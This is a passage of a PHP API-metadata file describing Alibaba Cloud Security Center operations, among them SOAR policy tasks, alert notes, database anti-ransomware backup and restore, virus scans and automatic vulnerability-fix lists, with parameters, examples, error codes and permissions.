[DescribeSoarSubscribedStrategy](~~DescribeSoarSubscribedStrategy~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '13840', 'title' => ''], ], [ 'name' => 'StrategyTaskName', 'in' => 'query', 'schema' => ['description' => 'The name of the policy task.', 'type' => 'string', 'required' => true, 'example' => 'task1', 'title' => ''], ], [ 'name' => 'StrategyName', 'in' => 'query', 'schema' => ['description' => 'The policy name. Fixed value: Automated Batch Vulnerability Fix Policy.', 'type' => 'string', 'required' => true, 'example' => 'Automated Batch Vulnerability Fixing Policy for Multiple Servers', 'title' => ''], ], [ 'name' => 'StrategyTaskParams', 'in' => 'query', 'schema' => ['description' => 'The parameter information of the policy. A string in JSONArray format with the following items:'."\n" ."\n" .'Vulnerability configuration item. Valid values:'."\n" .'- name: vluList'."\n" .'- associationProperty: sasAllVul'."\n" .'- value: basic information about the vulnerability'."\n" ."\n" .'Snapshot configuration item. Valid values:'."\n" .'- name: snapshotConfig'."\n" .'- associationProperty: snapshotConfig'."\n" .'- value: storage time information'."\n" ."\n" .'Notification configuration. Valid values:'."\n" .'- name: notifyConfig'."\n" .'- associationProperty: notifyConfig'."\n" .'- value: email or DingTalk configuration information.', 'type' => 'string', 'required' => true, 'example' => '['."\n" .' {'."\n" .' "name": "vulList",'."\n" .' "associationProperty": "sasAllVul",'."\n" .' "value": ['."\n" .' {'."\n" .' "regionId": "cn-hangzhou",'."\n" .' "instanceId": "i-bp10i******68lo5e",'."\n" .' "instanceName": "instance****",'."\n" .' "vulId": 3974347681,'."\n" .' "vulName": "centos:7:cesa-2024:1249",'."\n" .' "vulAliasName": "CESA-2024:1249",'."\n" .' "vulTag": "oval",'."\n" .' "vulUuid": "3c5eb76a-******-85ef-67562cdc2344",'."\n" .' "vulType": "cve",'."\n" .' "vulModifyTs": 1721324258000'."\n" .' }'."\n" .' ]'."\n" .' },'."\n" .' {'."\n" .' "name": "snapshotConfig",'."\n" .' "associationProperty": "snapshotConfig",'."\n" .' "value": {'."\n" .' "ttl": 1'."\n" .' }'."\n" .' },'."\n" .' {'."\n" .' "name": "notifyConfig",'."\n" .' "associationProperty": "notifyConfig",'."\n" .' "value": {'."\n" .' "ding": ['."\n" .' {'."\n" .' "value": 2195,'."\n" .' "label": "test"'."\n" .' }'."\n" .' ]'."\n" .' }'."\n" .' }'."\n" .']'."\n", 'title' => ''], ], [ 'name' => 'StrategyTaskPlanExeTime', 'in' => 'query', 'schema' => ['description' => 'The planned execution timestamp of the policy task. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1586739841000', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'StrategyTaskId' => ['description' => 'The policy task ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '10688', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '43313389-DED8-5BB7-8CB9-F22CDEB744DE', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Create a policy task', 'description' => 'Only the Enterprise and Ultimate editions of Security Center support this API operation. Other editions do not support this operation.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateSoarStrategyTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateSoarStrategyTask', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"StrategyTaskId\\": 10688,\\n \\"RequestId\\": \\"43313389-DED8-5BB7-8CB9-F22CDEB744DE\\"\\n}","type":"json"}]', ], 'CreateSuspEventNote' => [ 'methods' => ['post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '137238', 'abilityTreeNodes' => ['FEATUREsasNB8R24'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'EventId', 'in' => 'query', 'schema' => ['description' => 'The ID of the security alert event to which you want to add a note. Call [DescribeSuspEvents](~~251497~~) to obtain the ID of the alert event.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '668931', 'title' => ''], ], [ 'name' => 'Note', 'in' => 'query', 'schema' => ['description' => 'The note to add.', 'type' => 'string', 'required' => true, 'example' => 'Ignore', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => '', 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'The result of processing the alert event. Valid values:'."\n" ."\n" .'- **true**: Succeeded.'."\n" .'- **false**: Failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The detailed information about the error code.', 'type' => 'string', 'example' => 'There was an error with your request.', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '7E0618A9-D5EF-4220-9471-C42B5E92719F', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Create a note for a security alert event', 'summary' => 'Creates a note for a security alert event.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateSuspEventNote'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateSuspEventNote', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"There was an error with your request.\\",\\n \\"RequestId\\": \\"7E0618A9-D5EF-4220-9471-C42B5E92719F\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'CreateUniBackupPolicy' => [ 'summary' => 'Creates an anti-ransomware policy for a database.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '91941', 'abilityTreeNodes' => ['FEATUREsas7JO011'], ], 'parameters' => [ [ 'name' => 'PolicyName', 'in' => 'query', 'schema' => ['description' => 'The name of the anti-ransomware policy.'."\n", 'type' => 'string', 'required' => true, 'example' => 'mysql-policy', 'title' => ''], ], [ 'name' => 'InstanceId', 'in' => 'query', 'schema' => ['description' => 'The ID of the Elastic Compute Service (ECS) instance.'."\n" ."\n" .'> You can call the [DescribeUniBackupDatabase](~~DescribeUniBackupDatabase~~) operation to query the IDs of ECS instances.'."\n", 'type' => 'string', 'required' => true, 'example' => 'i-bp1fu4aqltf1huhc****', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server whose data is backed up based on the anti-ransomware policy.'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~141932~~) operation to query the UUIDs of servers.'."\n", 'type' => 'string', 'required' => false, 'example' => '045cad48-eb08-4047-a70c-713aec7b****', 'title' => ''], ], [ 'name' => 'DatabaseType', 'in' => 'query', 'schema' => ['description' => 'The type of the database. Valid values:'."\n" ."\n" .'* **MYSQL**'."\n" .'* **ORACLE**'."\n" .'* **MSSQL**'."\n", 'type' => 'string', 'required' => true, 'example' => 'MYSQL', 'title' => ''], ], [ 'name' => 'Retention', 'in' => 'query', 'schema' => ['description' => 'The retention period of backup data.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '7', 'title' => ''], ], [ 'name' => 'SpeedLimiter', 'in' => 'query', 'schema' => ['description' => 'The maximum network bandwidth that is allowed during data backup. Unit: bytes.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '5242880', 'title' => ''], ], [ 'name' => 'AccountName', 'in' => 'query', 'schema' => ['description' => 'The name of the database account.'."\n", 'type' => 'string', 'required' => false, 'example' => 'admin', 'title' => ''], ], [ 'name' => 'AccountPassword', 'in' => 'query', 'schema' => ['description' => 'The password of the database account.'."\n", 'type' => 'string', 'required' => false, 'example' => 'Pass****', 'title' => ''], ], [ 'name' => 'DatabaseAddByUser', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the database is manually added. Valid values:'."\n" ."\n" .'* **true**: yes'."\n" .'* **false**: no'."\n", 'type' => 'string', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'UniRegionId', 'in' => 'query', 'schema' => ['description' => 'The region in which the server resides.'."\n", 'type' => 'string', 'required' => true, 'example' => 'cn-hangzhou', 'title' => ''], ], [ 'name' => 'FullPlan', 'in' => 'query', 'style' => 'json', 'schema' => ['description' => 'The policy for full data backup. The value of this parameter is a JSON string. The JSON string contains the following fields:'."\n" ."\n" .'* **start**: the start time of a backup task.'."\n" .'* **interval**: the interval of backup tasks.'."\n" .'* **type**: the unit of the interval.'."\n" .'* **days**: the days of a week on which a backup task is performed.'."\n", 'type' => 'object', 'required' => true, 'example' => '{"days":[4],"interval":1,"planType":"weekly","startTime":"22:00:00"}', 'title' => ''], ], [ 'name' => 'IncPlan', 'in' => 'query', 'style' => 'json', 'schema' => ['description' => 'The policy for incremental data backup. The value of this parameter is a JSON string. The JSON string contains the following fields:'."\n" ."\n" .'* **start**: the start time of a backup task.'."\n" .'* **interval**: the interval of backup tasks.'."\n" .'* **type**: the unit of the interval.'."\n" .'* **days**: the days of a week on which a backup task is performed.'."\n", 'type' => 'object', 'required' => true, 'example' => '{"interval":1,"planType":"daily","startTime":"23:30:00"}', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '2FAEB7D0-C0B9-581C-877A-F80F50AA****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'FailedToActivateUniBackupInstance', 'errorMessage' => 'Failed to activate unbackup instance.', 'description' => 'Password verification error, please try again!'], ['errorCode' => 'AntiRansomwareCapacityUseUp', 'errorMessage' => 'anti ransomware capacity use up', 'description' => ''], ['errorCode' => 'DatabaseTypeNotSupport', 'errorMessage' => 'Database type not supported.', 'description' => ''], ['errorCode' => '-101', 'errorMessage' => 'Invalid parameter value.', 'description' => 'Invalid parameter.'], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'CreateUniBackupPolicy', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateUniBackupPolicy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateUniBackupPolicy', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"2FAEB7D0-C0B9-581C-877A-F80F50AA****\\"\\n}","type":"json"}]', ], 'CreateUniRestorePlan' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'create'], 'parameters' => [ [ 'name' => 'TimePoint', 'in' => 'query', 'schema' => ['description' => 'The point in time to which you want to restore the database.'."\n" .'>Call the [DescribeRestorePlans](~~DescribeRestorePlans~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '1656957664000', 'title' => ''], ], [ 'name' => 'PolicyId', 'in' => 'query', 'schema' => ['description' => 'The ID of the database anti-ransomware backup policy.'."\n" .'>Call the [DescribeUniBackupPolicies](~~DescribeUniBackupPolicies~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '123', 'title' => ''], ], [ 'name' => 'Database', 'in' => 'query', 'schema' => ['description' => 'The name of the database.', 'type' => 'string', 'required' => false, 'example' => 'qtc', 'title' => ''], ], [ 'name' => 'InstanceUuid', 'in' => 'query', 'schema' => ['description' => 'The unique identifier of the database backup client on the destination server for restoration.'."\n" .'>Call the [DescribeUniBackupDatabase](~~DescribeUniBackupDatabase~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'ac457b30598d11ed800000163e02****', 'title' => ''], ], [ 'name' => 'ResetTime', 'in' => 'query', 'schema' => ['description' => 'The **reset_time** value of the selected record from the recoverable points in time when you query backups for an Oracle database.'."\n" .'>Call the [DescribeUniRecoverableList](~~DescribeUniRecoverableList~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '2022-10-29 01:06:24', 'title' => ''], ], [ 'name' => 'ResetScn', 'in' => 'query', 'schema' => ['description' => 'The **reset_scn** value of the selected record from the recoverable points in time when you query backups for an Oracle database.'."\n" .'>Call the [DescribeUniRecoverableList](~~DescribeUniRecoverableList~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '925702.0', 'title' => ''], ], [ 'name' => 'RestoreInfo', 'in' => 'query', 'schema' => ['description' => 'The database restoration information when the database type is MSSQL. The value is a JSON string. Valid values:'."\n" .'- **name**: the name of the database.'."\n" .'- **files**: the file path of the database.'."\n" .'>Call the [DescribeUniRecoverableList](~~DescribeUniRecoverableList~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '{"files": {"qtc":"F:\\\\database\\\\qtc.mdf","qtc_log":"F:\\\\database\\\\qtc_0.ldf"},'."\n" .'"name":"qtc"}', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'F5CF78A7-30AA-59DB-847F-13EE3AE7****', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Create a database anti-ransomware restoration task', 'summary' => 'Creates a database anti-ransomware restoration task.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateUniRestorePlan'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateUniRestorePlan', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F5CF78A7-30AA-59DB-847F-13EE3AE7****\\"\\n}","type":"json"}]', ], 'CreateUnknownThreatDetectStrategy' => [ 'summary' => 'Creates an intelligent behavior analytics policy.', 'path' => '', 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasXNUPZF'], 'autoTest' => true, 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The policy name.', 'type' => 'string', 'required' => false, 'example' => 'strategy****', 'title' => ''], ], [ 'name' => 'StudyMode', 'in' => 'query', 'schema' => ['description' => 'The whitelist mode. Valid values:'."\n" ."\n" .'- **hash**: process hash'."\n" .'- **path**: process path', 'type' => 'string', 'required' => false, 'example' => 'hash', 'title' => ''], ], [ 'name' => 'AssetSelectionType', 'in' => 'query', 'schema' => ['description' => 'The asset selection identifier.', 'type' => 'string', 'required' => false, 'example' => 'UNKNOWN_THREAT_DETECT_CONFIG_****', 'title' => ''], ], [ 'name' => 'DurationDaysAfterInit', 'in' => 'query', 'schema' => ['description' => 'The number of days after the model is initially created before learning ends.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'DurationDaysAfterStop', 'in' => 'query', 'schema' => ['description' => 'The number of days after which the model ends learning if no new processes are added.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'Id of the request', 'type' => 'string', 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****'], 'Id' => ['description' => 'The policy ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'EdrSaleAdmissionDenied', 'errorMessage' => 'EDR Sale Admission Denied.', 'description' => 'No Agentic-EDR purchased'], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Create an intelligent behavior analytics policy', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\",\\n \\"Id\\": 1\\n}","type":"json"}]', ], 'CreateUserSetting' => [ 'summary' => 'Saves the risk level settings for baseline checks of a user.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '101932', 'abilityTreeNodes' => ['FEATUREsasDM8NT3'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '112.48.16.***', 'title' => ''], ], [ 'name' => 'InvalidWarningKeepDays', 'in' => 'query', 'schema' => ['description' => 'The number of days to retain false positive alerts.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '7', 'title' => ''], ], [ 'name' => 'AlertLevels', 'in' => 'query', 'schema' => ['description' => 'The list of alert notification levels.', 'type' => 'string', 'required' => false, 'example' => 'high,low', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each API request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'A1EE5AFD-0867-5F4F-9BE1-EBDD2C35****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Save user baseline check settings', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateUserSetting'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateUserSetting', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A1EE5AFD-0867-5F4F-9BE1-EBDD2C35****\\"\\n}","type":"json"}]', ], 'CreateVirusScanOnceTask' => [ 'summary' => 'Creates a one-time virus scan task that is immediately executed.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasE5WAEJ'], ], 'parameters' => [ [ 'name' => 'SelectionKey', 'in' => 'query', 'schema' => ['description' => 'The key that stores the asset information.'."\n" ."\n" .'> You can call the [GetAssetSelectionConfig](~~GetAssetSelectionConfig~~) operation to obtain the key value.'."\n", 'type' => 'string', 'required' => false, 'example' => '845de1ec-4b08-42e1-b564-31321e48xxxx', 'title' => ''], ], [ 'name' => 'ScanType', 'in' => 'query', 'schema' => ['description' => 'The type of the virus scan. Valid values:'."\n" ."\n" .'* **system**: system scan.'."\n" .'* **user**: custom scan.'."\n", 'type' => 'string', 'required' => false, 'example' => 'system', 'title' => ''], ], [ 'name' => 'ScanPath', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The information about the scan path that is required for a custom scan.'."\n", 'type' => 'array', 'items' => ['description' => 'The absolute path of the file.'."\n", 'type' => 'string', 'required' => false, 'example' => '/var/spool/cron', 'title' => ''], 'required' => false, 'maxItems' => 1000, 'title' => '', 'example' => '', ], ], [ 'name' => 'Param', 'in' => 'query', 'schema' => ['description' => 'Additional information fields: '."\n" .'- **additionType**: The type of extended scan', 'type' => 'string', 'required' => false, 'example' => '{\\"additionType\\":[\\"SCAN_MEMORY\\"]}', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'Schema of Response', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => 'Id of the request', 'description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'CE500770-42D3-442E-9DDD-156E0F9F3B45'], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'CreateVirusScanOnceTask', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateVirusScanOnceTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateVirusScanOnceTask', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"CE500770-42D3-442E-9DDD-156E0F9F3B45\\"\\n}","type":"json"}]', ], 'CreateVulAutoRepairConfig' => [ 'summary' => 'Creates a list of vulnerabilities that can be automatically fixed. After the list is created, you can select the list when you create a vulnerability fixing task on the Playbook page.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '134324', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Type', 'in' => 'query', 'schema' => [ 'title' => '', 'description' => 'The type of the vulnerability. Valid values: -**cve**: Linux software vulnerability -**sys**: Windows system vulnerability'."\n", 'type' => 'string', 'required' => true, 'enumValueTitles' => [], 'example' => 'cve', 'enum' => ['cve', 'sys'], ], ], [ 'name' => 'VulAutoRepairConfigList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The vulnerabilities that can be automatically fixed.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The vulnerability that can be automatically fixed.'."\n", 'type' => 'object', 'properties' => [ 'AliasName' => ['title' => '', 'description' => 'The alias of the vulnerability.'."\n", 'type' => 'string', 'required' => true, 'example' => 'CVE-2018-25032:zlib 1.2.11 memory corruption'], 'Name' => ['title' => '', 'description' => 'The name of the vulnerability.'."\n", 'type' => 'string', 'required' => true, 'example' => 'anolisos:8.4:ANSA-2022:0001'], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => true, 'maxItems' => 50, 'minItems' => 1, 'title' => '', 'example' => '', ], ], [ 'name' => 'Reason', 'in' => 'query', 'schema' => ['description' => 'The reason why the vulnerability can be automatically fixed.'."\n", 'type' => 'string', 'required' => false, 'example' => 'TestAutoRepair', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '6673D49C-A9AB-40DD-B4A2-B92306701AE7', 'title' => ''], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**: The request was successful.'."\n" .'* **false**: The request failed.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code returned. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The error message returned.'."\n", 'type' => 'string', 'example' => 'success', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'InnerError', 'errorMessage' => 'InnerError', 'description' => ''], ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'CreateVulAutoRepairConfig', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateVulAutoRepairConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateVulAutoRepairConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"6673D49C-A9AB-40DD-B4A2-B92306701AE7\\",\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"success\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'DeleteAntiBruteForceRule' => [ 'summary' => 'Deletes a specified anti-brute-force attacks rule.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'delete', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '91943', 'abilityTreeNodes' => ['FEATUREsas2XWKXT'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Ids', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The IDs of the brute-force attacks defense rules that you want to delete.', 'type' => 'array', 'items' => ['description' => 'The ID of the brute-force attacks defense rule that you want to delete.'."\n" .'> You can invoke the [DescribeAntiBruteForceRules](~~DescribeAntiBruteForceRules~~) operation to obtain the ID.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '62650', 'title' => ''], 